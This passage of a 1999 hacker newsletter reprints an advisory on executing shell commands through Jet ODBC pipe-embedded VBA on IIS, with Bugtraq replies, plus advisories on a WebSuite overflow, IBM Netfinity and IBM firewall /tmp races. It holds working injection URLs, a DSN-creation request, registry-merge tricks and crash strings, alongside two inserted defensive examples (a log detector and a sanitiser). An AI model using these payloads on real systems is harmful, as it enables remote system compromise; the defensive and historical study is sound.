Commands can be stacked:
|shell("cmd /c echo 1 > %temp%\foo.txt") & shell("cmd /c echo 2 \
>> %temp%\foo.txt") & shell("cmd /c echo 3 >> %temp%\foo.txt")|
** line broken for clarity
It is not clear that the commands will always be executed in order. Each
shell command executes asynchronously so the code above has two races for
whether the shell commands finish updating the file before the next one
starts - results will be variable.
--[ Could an attacker modify registry keys?
Ultimately the hole allows anything since you can up/download and run any
code, but modifying registry keys from VBA seems to be a little tricky.
The method using advapi32.dll won't work because it requires statements to
declare functions from the library, but there doesn't seem to be a way of
giving a statement a return value in VBA.
It would be easier to create a temporary .reg file and then merge it with
"cmd /c regedit /s %temp%\tmp.reg"; the '/s' is important, as it
suppresses the informational dialogs/windows.
--[ What permissions will an attacker have?
The dangerous part comes from a context misinterpretation with IIS. IIS
runs as system_local; it changes its token context (typically to IUSR_xxx)
for filesystem access and application execution. However, the context
does *NOT* change when interfacing with the ODBC API. Therefore all ODBC
functions (and the associated database calls) are happening under
system_local. This allows full access to the system.
--[ Theory of exploitation
This problem can be used over the web against scripts that make queries
against local MS Jet ODBC DSNs, therefore, any script or application that
uses a MS Jet ODBC DSN could potentially be exploited. The solution is to
not use MS Jet ODBC drivers for any DSN--until Microsoft releases a fix.
But since this is a documented feature, there stands a chance that some
applications may break if removed.
--[ Reality of exploitation
Ok, so let's get down to some nitty-gritty, real-life examples. We'll
give a few that just demonstrate the problem....but since any
script/application that gives user entered strings to the MS Jet ODBC DSN
are vulnerable, we're not going to laundry-list them; rather, we'll show
some of the more common cases we found.
--[ Importance of the DSN
Just some really quick background on ODBC & DSNs: an application
'connects' to the ODBC service specifying a specific DSN to query to. The
DSNs are defined in the ODBC32 applet of the control panel. Each DSN is
basically a description of the name of the DSN, the drivers to use (in our
case, the MS Jet/Access drivers), and location of the actual database (a
.mdb file somewhere in the filesystem). We could also have DSNs that used
drivers such as Oracle or MS Sql, and the location would be another
server. The whole point is that you only need to know the DSN name--ODBC
will take care of where and how the actual database is to be used.
So, great, these scripts query a DSN by name. Well, there are times where
a server can have the scripts we mention, but when ran, you get an error
saying DSN is not found. So now what? Well, if it's an IIS server, check
for the existence of /scripts/tools/newdsn.exe. Yes, IIS includes CGI
applications *to make DSNs*. If the server doesn't have the DSN we need,
we can just make it for them. We only need newdsn.exe, but it's possible
to use a 'GUI' through getdrvrs.exe and dsnform.exe. Here's a flowchart:
http://server/scripts/tools/getdrvrs.exe
-> pick Microsoft Access Driver (*.mdb)
-> Enter in the correct DSN name
-> Enter a location for the .mdb, example: c:\web.mdb
-> Submit
This will create the DSN. If you want to be ultra-elite and do it the
hard way, you can pass all the parameters to newdsn.exe like so:
http://server/scripts/tools/newdsn.exe?driver=Microsoft%2B
Access%2BDriver%2B%28*.mdb%29&dsn=DSN_name&dbq=c:\web.mdb&
newdb=CREATE_DB&attr=
**all one line, no spaces
Where dsn is the name you want, and dbq is the file location. So for all
the examples, we'll include the DSN name, just in case you have to create
it.
--[ IIS Sample Applications
According to Russ Cooper of NTBugtraq, sample application problems are
stupid and we shouldn't waste our time talking about them. He's already
denied posts from myself, David Litchfield, and others. So, if you lived
in Russ's little world, you won't have any of the following sample apps
installed on your server, so you should just stop reading this article
right now. But for those of you who realize it's just not that simple,
perhaps you can learn something here. Also note this goes beyond sample
scripts--they're just being used as a command reference example.
Anyways, a good example script is
http://server/scripts/samples/details.idc?Fname=&Lname=
stick your shellcode in for either Fname or Lname, like so:
details.idc?Fname=hi&Lname=|shell("cmd+/c+dir")|
This uses DSN named "Web SQL" (notice the space). However, this causes
problems, because the actual table must be initialized in the DSN. Never
pheer, scripts are here! Run
http://server/scripts/samples/ctguestb.idc
after you create the DSN (if you had to) and before you run details.idc
--[ MSADC (IIS 4.0)
Starting with IIS 4.0, Microsoft bundled a way to do remote SQL queries on
a DSN simply by interfacing via HTTP to a specific .dll. Bug? Hole?
Nope, in the documentation Microsoft states that having MSADC installed
could lead to security problems.
The particular .dll is at
http://server/msadc/msadcs.dll
Now the particular problem is that there's a slightly custom way to
interface to the .dll, using multipart-forms. So it's beyond the scope of
just typing in a parameter by hand. So there's two options.
One is to see if the server also has the (optional) interface installed.
Check out for the existence of
http://server/msadc/samples/adctest.asp
** Note: you have to use Internet Explorer 4.0+ for this
This will give you a Java/Javascript interface that allows you to specify
the DSN, uid/password, and SQL string to execute. Note that you'll have
to obtain the table structure for the DSNs mentioned herein, because
you'll need to construct a valid SQL statement.
The other option is to obtain those files yourself from another server, or
download and install the MS RDS/ADO/ADC components. Look at
http://www.microsoft.com/data/ado/
for more info and where to download.
** One note is that the Java interface lets you specify which server to
use. So you can open the interface locally, off your own server, or find
it on server 1, and specify to run SQL commands against whatever DSN on
server 2.
The one caveat is that error information is not displayed. It helps to
have a sniffer running to see what ODBC error messages, if any, come back.
If you don't get a record listing, you'll want to see what the error was.
Now, what to do?
You can obviously just execute SQL commands that contain the pipe
character. For instance:
Connection: DSN=AdvWorks
Query: Select * from Products where ProductType='|shell("")|'
** Insert your shellcode in the shell() function
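A way to hunt for the probes described above in IIS logs, added here as an example that is not part of the advisory. It assumes the W3C extended log layout (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status); the log lines are constructed, with the advisory's details.idc payload URL-encoded the way a browser would send it. It flags hits on the entry points the advisory names (ctguestb.idc, msadcs.dll, adctest.asp) and any query string in which a Jet |...| expression carries a VBA call:

```javascript
// Added example (not from the advisory): flag probes for the IIS/ODBC/Jet
// pipe-VBA issue in IIS W3C extended log lines. Log layout and sample
// lines are constructed for this example.

// Entry points the advisory names (sample .idc scripts, MSADC).
const SUSPECT_PATHS = [
  '/scripts/samples/ctguestb.idc',
  '/msadc/msadcs.dll',
  '/msadc/samples/adctest.asp',
];

// Jet evaluates |expression| inside a string literal; a VBA call such as
// shell("...") between the bars is what the advisory abuses.
const PIPE_VBA = /\|[^|]*\b(shell|createobject)\s*\(/i;

// Decode the way IIS/IDC does: '+' is a space, %XX is a byte.
function decodeQuery(q) {
  try { return decodeURIComponent(q.replace(/\+/g, ' ')); }
  catch (e) { return q; }            // malformed escapes: scan the raw text
}

// Split one log line into the assumed W3C fields; '-' means empty query.
function parseLogLine(line) {
  const f = line.trim().split(/\s+/);
  if (f.length < 7) return null;
  return { date: f[0], time: f[1], ip: f[2], method: f[3],
           stem: f[4], query: f[5] === '-' ? '' : f[5], status: f[6] };
}

// Reasons a record is suspicious, in priority order (empty = clean).
function classify(rec) {
  const reasons = [];
  const stem = rec.stem.toLowerCase();
  if (SUSPECT_PATHS.includes(stem)) reasons.push('known-entry-point');
  const decoded = decodeQuery(rec.query);
  if (PIPE_VBA.test(decoded)) reasons.push('jet-pipe-vba');
  else if (stem.endsWith('.idc') && decoded.includes('|')) reasons.push('pipe-in-idc-param');
  return reasons;
}

// Scan a whole log; comment/header lines (#...) are skipped.
function scanLog(text) {
  const hits = [];
  for (const line of text.split('\n')) {
    if (!line.trim() || line.startsWith('#')) continue;
    const rec = parseLogLine(line);
    if (!rec) continue;
    const reasons = classify(rec);
    if (reasons.length) {
      hits.push({ ip: rec.ip, stem: rec.stem, query: decodeQuery(rec.query), reasons });
    }
  }
  return hits;
}

// Constructed sample log; line 3 carries the advisory's payload, encoded.
const SAMPLE_LOG = `
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
1999-05-25 21:02:11 10.0.0.5 GET /default.htm - 200
1999-05-25 21:03:40 10.0.0.5 GET /scripts/samples/ctguestb.idc - 200
1999-05-25 21:04:02 10.0.0.5 GET /scripts/samples/details.idc Fname=hi&Lname=%7Cshell(%22cmd+/c+dir%22)%7C 200
1999-05-25 21:05:19 10.0.0.9 GET /msadc/msadcs.dll - 200
1999-05-25 21:06:00 10.0.0.7 GET /scripts/samples/details.idc Fname=John&Lname=Smith 200
`;

for (const h of scanLog(SAMPLE_LOG)) {
  console.log(h.ip, h.stem, h.reasons.join(','), h.query);
}
```

The `pipe-in-idc-param` reason is deliberately broad: a bare `|` in a parameter destined for a Jet-backed .idc is worth a look even when no `shell(` follows it, since any VBA expression between the bars is evaluated.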
--[ Sign-Off
Well, I'm sure that's enough to chew for a bit. Sorry, the examples
weren't as in-depth as usual--you'll just have to be satisfied with
theory. :)
Matthew Astley [RCPS] http://www.fruitcake.demon.co.uk
.rain.forest.puppy. [WireTrip] rfp@wiretrip.net
.many thanks to Matthew for working on this project together. :>
.greetings to (#!)ADM, (#)Rhino9, and Phrack
.special thanks to joewee & antilove for giving me a hard time; stran9er
.for all the fun chats and setting me straight; and everyone else I forgot
.before these greets become longer than the advisory. :) Oh, and el8.org rox.
--[ This advisory is ISO 31337 certified. Fact of life: ADM > *
----------------------------------------------------------------------------------
Date: Tue, 25 May 1999 22:00:42 +0100
From: Vittal Aithal <vittal.aithal@REVOLUTIONLTD.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Advisory: NT ODBC Remote Compromise
Here's some javascript stuff that'll clean up quotes and things before
having them sent off in a sql query... only tested with access, so YMMV.
function cleanSql (str) {
    var newStr = "";
    str = "" + str;
    var oneChar = (str.length == 1);
    if (str.length == 0) { return "null"; }
    for (var i = 0; i < str.length; i++) {
        var repStr = "";
        // single quote: double it; pipe and double quote: emit as CHR() so
        // Jet never sees them inside the literal
        if (str.charAt(i) == "'") { newStr += "''"; }
        else if (str.charAt(i) == "|") { repStr = 124; }
        else if (str.charAt(i) == "\"") { repStr = 34; }
        else { newStr += str.charAt(i); }
        if (repStr) {
            // close the literal, splice in CHR(n) with Jet's & operator,
            // and reopen it, depending on where in the string we are
            if (i == 0 && !oneChar) {
                newStr += "CHR(" + repStr + ") &'";
            } else if (i == str.length - 1 && !oneChar) {
                newStr += "' & CHR(" + repStr + ")";
            } else if (!oneChar) {
                newStr += "' & CHR(" + repStr + ") & '";
            } else {
                newStr += "CHR(" + repStr + ")";
            }
        }
        // opening and closing quotes for a literal that starts/ends with
        // an ordinary character
        if (!repStr && i == 0) {
            newStr = "'" + newStr;
        }
        if (!repStr && i == str.length - 1) {
            newStr += "'";
        }
    }
    return newStr;
}
Not elegant, but it does work, and stops |'s getting through.
bye
vittal
--
Vittal Aithal
Revolution Ltd <tel: 0181 267 1000> <fax: 0181 267 1066>
<vittal.aithal@revolutionltd.com> <http://www.revolutionltd.com/>
<vittal.aithal@bigfoot.com> <http://www.bigfoot.com/~vittal.aithal/>
----------------------------------------------------------------------------------
Date: Tue, 25 May 1999 14:43:25 -0700
From: Bigby Findrake <bigby@HOME.SHIVA.EU.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Advisory: NT ODBC Remote Compromise
On Tue, 25 May 1999, Vittal Aithal wrote:
> Here's some javascript stuff that'll clean up quotes and things before
> having them sent off in a sql query... only tested with access, so YMMV.
Do keep in mind that this will stop people from using the
aforementioned exploits *only when using your forms*. It is still
possible to download your web pages, remove the javascript hooks, and then
submit their information, or call the CGI (if method GET is accepted) by
hand, and get around such security measures.
----------------------------------------------------------------------------------
Date: Wed, 26 May 1999 09:01:26 +0100
From: Vittal Aithal <vittal.aithal@REVOLUTIONLTD.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Advisory: NT ODBC Remote Compromise
Just to clarify my earlier posting;
The code I posted was server-side ASP Javascript. As a number of people
have/will point out, running it at the client isn't going to help.
I suspect the same methodology could be applied for other environments
(coldfusion / perl DBI::DBD / php / etc).
cheers
vittal
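Bigby's point above is that the check has to live in the ASP page that builds the query, not in the form, and Vittal's clarification confirms his function runs there. The following is an added example, not Vittal's cleanSql and not the advisory's code, of a server-side handler in the same ASP-style JavaScript: it takes the raw GET query string, so a hand-built request gets exactly the same treatment as one from the form. It assumes the Guests table from the Web SQL sample and a Fname/Lname pair as in details.idc; the unsafe builder is included only to show where the |shell()| expression lands. Unlike cleanSql, which re-encodes the pipe as CHR(124), this version simply refuses it, which is the right call for a name field:

```javascript
// Added example, not Vittal's cleanSql and not the advisory's code. Table
// and parameter names follow the Web SQL sample (Guests, Fname, Lname);
// the request handler is simulated so the file runs stand-alone.

// Decode an IDC/ASP query-string value the way IIS does: '+' is a space,
// %XX is a byte. Malformed escapes throw; the handler treats that as bad input.
function decodeParam(v) {
  return decodeURIComponent(v.replace(/\+/g, ' '));
}

// Raw query string -> object. This is the server's only view of the input;
// whatever the form's JavaScript did, or was skipped, is irrelevant here.
function parseQueryString(qs) {
  const out = {};
  for (const pair of qs.replace(/^\?/, '').split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const k = eq < 0 ? pair : pair.slice(0, eq);
    const v = eq < 0 ? '' : pair.slice(eq + 1);
    out[decodeParam(k)] = decodeParam(v);
  }
  return out;
}

// What details.idc effectively does: paste the value into the literal.
// Jet sees |shell("...")| inside the quotes and evaluates it.
function buildLookupUnsafe(params) {
  return "SELECT * FROM Guests WHERE FirstName='" + params.Fname +
         "' AND LastName='" + params.Lname + "'";
}

// Hardened: a name is letters plus a few punctuation marks, nothing else.
// '|' is Jet's expression delimiter, so it is refused outright rather than
// encoded; a single quote is doubled, which is all SQL needs.
const NAME_OK = /^[A-Za-z][A-Za-z' .-]{0,49}$/;

function toJetLiteral(value) {
  if (typeof value !== 'string') throw new Error('missing value');
  if (value.includes('|')) throw new Error('rejected: "|" is the Jet expression delimiter');
  if (!NAME_OK.test(value)) throw new Error('rejected: not a plausible name');
  return "'" + value.replace(/'/g, "''") + "'";
}

function buildLookupSafe(params) {
  return 'SELECT * FROM Guests WHERE FirstName=' + toJetLiteral(params.Fname) +
         ' AND LastName=' + toJetLiteral(params.Lname);
}

// Belt-and-braces check any handler can run on the final statement: a bare
// '|' anywhere in it means Jet may evaluate something as VBA.
function hasJetPipe(sql) {
  return sql.includes('|');
}

// Simulated ASP handler: it gets the raw GET query string, exactly what a
// hand-crafted request delivers when the form is bypassed.
function handleLookup(rawQueryString) {
  try {
    const sql = buildLookupSafe(parseQueryString(rawQueryString));
    if (hasJetPipe(sql)) throw new Error('pipe survived into SQL');
    return { ok: true, sql };
  } catch (e) {
    return { ok: false, error: e.message };
  }
}

// The advisory's payload as a browser would send it, and a normal request.
const PAYLOAD = 'Fname=hi&Lname=%7Cshell(%22cmd+/c+dir%22)%7C';
const NORMAL = "Fname=Mary&Lname=O'Brien";

console.log(buildLookupUnsafe(parseQueryString(PAYLOAD)));  // expression reaches Jet intact
console.log(handleLookup(PAYLOAD));                          // refused before any SQL is built
console.log(handleLookup(NORMAL));                           // quote doubled, pipe-free
```

Rejecting is preferable to encoding whenever the field's legitimate values never contain the character; CHR()-style re-encoding is the fallback for free-text fields that must be able to store a pipe.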
----------------------------------------------------------------------------------
Date: Wed, 26 May 1999 18:56:05 +0200
From: Bronek Kozicki <bronek@wpi.com.pl>
To: BUGTRAQ@netspace.org
Subject: Re: Advisory: NT ODBC Remote Compromise
Hello
I have run some testing. Seems to me that this error has been repaired in
MSJET40, but exists in MSJET35. Effectively, if Jet 4 is installed (and it's
used by ODBC) there's no problem with .IDC files. If one does not have Jet 4
and is using .IDC to open Jet databases (I have not verified this) I believe
this is the dangerous situation described by Matthew Astley.
Because MS Access 97 is using Jet 3.5 (even if Jet 4 is installed), the
problem still can be seen there.
If instead of .IDC (which is considered obsolete) one is using .ASP + ADODB,
and ADODB provider used is "Microsoft.Jet.OLEDB.3.51" (i.e. older than
"4.0") then problem still exists.
It's worth noticing that the SQL implementation used in Jet 4 and Jet 3.5
is a little different. Thus applications (in some situations) cannot be simply
ported from one to another. One thing I found is different handling of the
single- and double-quote character. MS still has not documented the differences
(or I had no luck finding them). AFAIK MS Jet 4 comes with Microsoft Data
Access 2.1 (MSDAC21).
Details:
System: WinNT Wrkst 4 US, SP5 , IE5 , IIS 4 (Option Pack), ODBC MS Access
Driver 4.00.3513.00, other (cursor library, administrator etc.) ODBC files
3.510.3711.0
Database: Access 97, Jet 3.51.2026.0 (I have also Jet 4.00.2115.25
installed, but Access 97 uses older version)
Table "guests" as described in Web SQL.
Query "SecurityTest" as below:
SELECT FirstName, LastName FROM Guests WHERE LastName =
'|Shell("notepad.exe",1)|';
What happens:
- If I open the query under MS Access, it opens the Notepad app and shows the
(empty) resultset. So far the mentioned SQL "feature" works.
- If I use MSQRY32.EXE to open the database, nothing more happens than
showing the resultset (empty one). The same if I run MSQRY32 from within MS
Excel ("Get External Data")
- I created TEST.IDC file as below (and TEST.HTX, of course):
Datasource: Web SQL
Username: sa
Template: details.htx
SQLStatement:
+SELECT FirstName, LastName
+FROM SecurityTest
and opened it through HTTP. The only result is an empty resultset. I checked
list of processes (using TLIST.EXE) and notepad was not run.
- I created TEST2.IDC file as below:
Datasource: Web SQL
Username: sa
Template: details.htx
SQLStatement:
+SELECT FirstName, LastName
+FROM Guests
+WHERE LastName <> '|Shell("notepad.exe",1)|'
the same. Notepad did not run.
- I created very simple .ASP
<HTML>
<HEAD>
<%
Param = Request.QueryString("Param")
Data = Request.QueryString("Data")
%>
</HEAD>
<BODY>
<%
Set Conn1 = CreateObject("ADODB.Connection")
'strConn = "Provider=Microsoft.Jet.OLEDB.3.51;Data Source=c:\temp\test.mdb;Mode=Read"
strConn = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=c:\temp\test.mdb;Mode=Read"
strSQL = "SELECT FirstName , LastName FROM SecurityTest"
Conn1.Open strConn
Set RSet1 = Conn1.Execute(strSQL)
RSet1.Close
Conn1.Close
%>
</BODY>
</HTML>
Notice that there are 2 connection strings, one is used and the other
commented out. The upper connection string ("Provider=Microsoft.Jet.OLEDB.3.51")
is UNSAFE. When I opened the .ASP it started NOTEPAD.EXE in the context of the WWW
server. If a WWW client can type any literal into an HTML form, pass it to an
.ASP application (for example to be used in a "WHERE" clause) and it remains
non-parsed, then he/she will be able to run ANY code in the context of
LocalSystem. If such a WWW server is also a domain controller ... well, I'm a
bit scared to think about it. The lower connection string
("Provider=Microsoft.Jet.OLEDB.4.0") seems to be safe.
I hope somebody can verify my tests. The most important point is that while .IDC
files are using the current ODBC, it strongly depends on the configuration of the
system. If Jet 4 is installed and is used by ODBC, we are safe. The same
applies to .ASP + ODBC. On the other side is .ASP + ADODB, where the Jet engine
can be explicitly selected. If Jet older than 4 is used then we have a
dangerous situation. Fortunately in .ASP we can easily parse strings passed
from the WWW client (like Vittal Aithal did in JavaScript, but the function will be
run on the server side).
Regards.
Bronek Kozicki
--------------------------------------------------
ICQ UID: 25404796 PGP KeyID: 0x4A30FA9A
07EE 10E6 978C 6B33 5208 094E BD61 9067 4A30 FA9A
: -----Original Message-----
: From: Bugtraq List [mailto:BUGTRAQ@NETSPACE.ORG]
: Sent: Tuesday, May 25, 1999 9:00 PM
: To: BUGTRAQ@NETSPACE.ORG
: Subject: Advisory: NT ODBC Remote Compromise
:
:
: --[ Advisory: NT ODBC Remote Compromise
:
: --[ By Matthew Astley [RCPS] http://www.fruitcake.demon.co.uk
: --[ & Rain Forest Puppy [WireTrip] rfp@wiretrip.net
:
: --[ Brief Summary
:
: MS Jet database engine (which runs Access databases) allows an individual
: to embed VBA in string expressions, which may allow the individual to run
: commandline NT commands. This, combined with the flaw of IIS running ODBC
: commands as system_local allow a remote attacker to have full control of
: the system. Other webservers may be affected. Many MS Jet engines are
: affected, but may not lead to elevated priviledges.
Here's something that does not work for me. ODBC is not using the Jet "feature"
to run embedded VBA expressions. It seems to use a different database engine.
: --[ Background
:
: ODBC allows a program flexible access to one or more relational databases
: using SQL. If a client fails to quote correctly the meta characters in a
: piece of data used in an SQL query, an attacker may be able to interfere
: with the tables in the database (see MS SQL appension 'feature' in Phrack
: 54, article 8).
That's true, but not connected to the subject. The attacker seems not to use
Jet, while the "feature" exists just there. At least on my system.
: However, the Microsoft "Jet" database engine (aka MS Access) provides some
: extensions to SQL which allow the execution of VBA (Visual Basic for
: Applications). This makes holes in meta character quoting code much more
: interesting and dangerous.
That's true.
[cut]
----------------------------------------------------------------------------------
Date: Thu, 27 May 1999 15:48:48 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Advisory: NT ODBC Remote Compromise
I've had 2 individuals suggest that MDAC 2.1 solves the problems
described by rfp@wiretrip.net regarding NT ODBC and Access. There is
also another message on Bugtraq suggesting the same thing.
Daryl Banttari [daryl@windsorcs.com] reports that Allaire's ColdFusion
product is vulnerable to the same attack when using Access datasources,
but appears not to be vulnerable after installing MDAC 2.1.
I could put a direct link here to MDAC 2.1, but the fact is that you
should not simply upgrade to it without understanding what it changes
(and what effect those changes may have on your existing environment).
So instead, I give you;
http://www.microsoft.com/data/MDAC21info/MDAC21GAmanifest.htm
which has a ton of information about the MDAC 2.1 release.
Cheers,
Russ - NTBugtraq Editor
----------------------------------------------------------------------------------
Date: Thu, 27 May 1999 17:20:45 -0500
From: Jesper M. Johansson <jesper.m.johansson-1@UMN.EDU>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Advisory: NT ODBC Remote Compromise
>I could put a direct link here to MDAC 2.1, but the fact is that you
>should not simply upgrade to it without understanding what it changes
>(and what effect those changes may have on your existing environment).
>So instead, I give you;
>
>http://www.microsoft.com/data/MDAC21info/MDAC21GAmanifest.htm
If you are using Excel data sources and are updating data in them you will
want to keep in mind that upgrading to MDAC 2.1 will break those data
sources. MDAC 2.1 no longer supports the update method for Excel data
sources. This will, for example, cause Cold Fusion to access violate, and
often causes crashes in InetSrv.exe if you are using IIS. Unfortunately, MS
forgot to mention that in the document Russ pointed to.
Jesper
Jesper.M.Johansson-1@umn.edu
Ph.D. Candidate, University of Minnesota
Editor, SANS NT Digest
MCSE , MCP + I
http://ids.csom.umn.edu/jesper
"Juris Praecepta sunt haec: honeste vivere,
alterum non laedere, suum cuique tribuere"
Ulpian
@HWA
53.0 Advisory: Buffer overflow in SmartDesk WebSuite v2.1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Advisory: Buffer overflow in SmartDesk WebSuite v2.1
Platforms Affected: Windows NT, Windows 98
Found by: cmart (cmart@staticusers.net)
Date: 5/23/99
Description:
-----------
WebSuite v2.1 will crash when an additional 250+ characters
are appended after the site's URL on NT Server 4 and NT
Workstation 4 boxes.
Running on top of Windows 98 it will crash with 150+ characters
appended after the site's URL.
After reinstalling on both platforms several times, the
overflow string length varied. Approximately 1 out of 8 times
the overflow string went from 150 chars (Win98) to about
1000+ chars. It also went from 250+ chars (NT) to about
2000+ chars.
After the server crashes on NT Workstation 4, it's unable
to find the lib file sysclass.flb (in our tests).
Details:
-------
[Windows NT]
http://hostname/00000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000
SDWEBSRV.EXE crashes.
[Windows 98]
http://hostname/00000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000
SDWEBSRV.EXE crashes.
-----------------------------
cmart | cmart@staticusers.net
http://winntsec.com
-----------------------------
@HWA
54.0 Security Leak with IBM Netfinity Remote Control Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 25 May 1999 13:05:56 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Security Leak with IBM Netfinity Remote Control Software
On May 10th, 1999, Thomas Krug reported to NTBugtraq;
>Hi,
>
>I found a method to run programs like regedit and user manager with
>admin rights using the above tool. The following test scenario has
>been used:
>
>PC with Windows NT Workstation in a Domain
>Registry has been secured (especially HKLM)
>The User has no local admin rights and is in no admin group.
>The execution of regedit and regedt32 has been forbidden by system
>policy.
>
>When running the Netfinity Client and starting the process manager
>(view, close and execute processes) and run for instance
>regedit.exe or musrmgr.exe the programs run under the user
>configured with the netfinity service, either the system account
>or an admin.
>
>Thomas
After an incredibly difficult journey through the labyrinth of IBM's
support groups, I finally spoke to a Ted McDaniels who, reportedly, was
responsible for support of the IBM Netfinity RCS.
After explaining Tom's issues with the product, Ted acknowledged that
IBM Netfinity RCS was "built with very little security in mind". He also
expressed doubt that any "fix" might be made to it to give it even the
most rudimentary NT security understandings.
IBM did promise to send some sort of explanation to NTBugtraq regarding
Thomas' findings, however, Ted has now gone on vacation and we're left
with nothing from them.
Can you detect how disappointed I am with IBM's reaction and handling of
this issue?
Thomas' company was in the process of ripping out IBM Netfinity RCS when
he originally submitted the issue, and all indications are that anyone
using IBM Netfinity RCS, or considering using it, should do the same.
Bottom line, there is no way to control what a user can or cannot do
with the "Process Manager" component of IBM Netfinity RCS, and clearly
they are able to usurp all other controls you might have placed on your
NT environment should the product be present. The service *must* be run
as either SYSTEM or ADMINISTRATOR.
If anyone has found a way to avoid the *HUGE SECURITY HOLE* this product
creates in an NT environment, please let us know.
Cheers,
Russ - NTBugtraq Editor
@HWA
55.0 IBM eNetwork Firewall for AIX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 25 May 1999 20:33:53 +0100
From: Paul Cammidge <paul@PCCC.CO.ZA>
To: BUGTRAQ@netspace.org
Subject: IBM eNetwork Firewall for AIX
The IBM eNetwork Firewall for AIX contains some poorly written scripts,
which create temporary files in /tmp without making any attempt to
validate the existence of the file. This allows any user with shell
access to such a firewall to corrupt or possibly modify system files by
creating links, pipes, etc. with the same name.
In a simple example submitted to IBM, /etc/passwd was overwritten. This
example has been published on one of their support web pages as a 'local
fix'.
The problem was reported to IBM early in January. To the best of my
knowledge, the correct procedures have been followed. Initially, IBM
responded by telling me that it was common practice for software to make
use of /tmp. They suggested changing the permissions to prevent users
from creating symbolic links to sensitive files.
An APAR (IR39562) was opened on 18/01/99 and closed on 13/03/99. The
fix has not yet been released. This definitely applies to version 3.2,
and probably others.
Anyone running this software who has users with shell accounts should be
aware that the potential exists for these users to corrupt files which
they don't have access to.
cheers
paul
--------------------------------------------------------------------------
Date: Sat, 29 May 1999 00:29:25 +0200
From: Marc Heuse <marc@SUSE.DE>
To: BUGTRAQ@netspace.org
Subject: Re: IBM eNetwork Firewall for AIX
Hi Paul,
> The IBM eNetwork Firewall for AIX contains some poorly written scripts,
> which create temporary files in /tmp without making any attempt to
> validate the existance of the file. This allows any user with shell
> access to such a firewall to corrupt or possibly modify system files by
> creating links, pipes, etc with the same name.
you are right, all their scripts have got link vulnerabilities ...
> The problem was reported to IBM early in January. To the best of my
> knowledge, the correct procedures have been followed. Initially, IBM
> responded by telling me that it was common practice for software to make
> use of /tmp. They suggested changing the permissions to prevent users
> from creating symbolic links to sensitive files.
when I found these in an audit at a customer in february, I opened an APAR
too, but then discovered yours. When I saw that yours was opened a month
before mine and not being dealt with, I made noise at IBM management and
the AIX Security Team, that they issued an emergency fix.
But this fix is only available to those who know that it exists - anyway, the
quick fix still has /tmp races all over the place - they just added "rm -f
file" on the line before writing into it ....
> An APAR (IR39562) was opened on 18/01/99 and closed on 13/03/99. The
> fix has not yet been released. This definately applies to version 3.2,
> and probably others.
I heard that the next IBM Firewall version will fix this ... bah - maybe
with that quick "fix" ...
But to set one thing straight: It's *not* IBM's fault. The IBM Firewall is a
product of another company called Raleigh (I hope thats spelled correctly).
In fact, the IBM AIX Security Team, especially Troy Bollinger, was very
helpful in getting a fix - a correct one - out. It's the other company
that writes security software but really seems to have no knowledge.
sad but true
Greets,
Marc
--
Marc Heuse, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg
E@mail: marc@suse.de Function: Security Support & Auditing
"lynx -source http://www.suse.de/~marc/marc.pgp | pgp -fka"
Key fingerprint = B5 07 B6 4E 9C EF 27 EE 16 D9 70 D4 87 B5 63 6C
@HWA
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
<img src="http://www.csoft.net/~hwa/canc0n.gif"> <br> Come.to/Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j
http:/ 99 http:o
http:/ login: sysadmin n99 httpi
/come. password: tp://comn
to/Can me.to/Cat
c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h
http:/ industry people to attend with booths and talks. 99 http:e
/come. you could have a booth and presentation for the cost of p://comel
http:/ little more than a doorprize (tba) contact us at our main n99http:i
http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s
http:/ for updates. This is the first Canadian event of its type invalid t
403 Fo and will have both white and black hat attendees, come out logged! !
404 Fi and shake hands with the other side... *g* mainly have some IP locked
ome.to fun and maybe do some networking (both kinds). see ya there! hostname
http:/ x99http:x
o/Canc x.to/Canx
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x
o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99
<a href="http://come.to/Canc0n99">Canc0n99</a> <a href="http://come.to/Canc0n99">Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
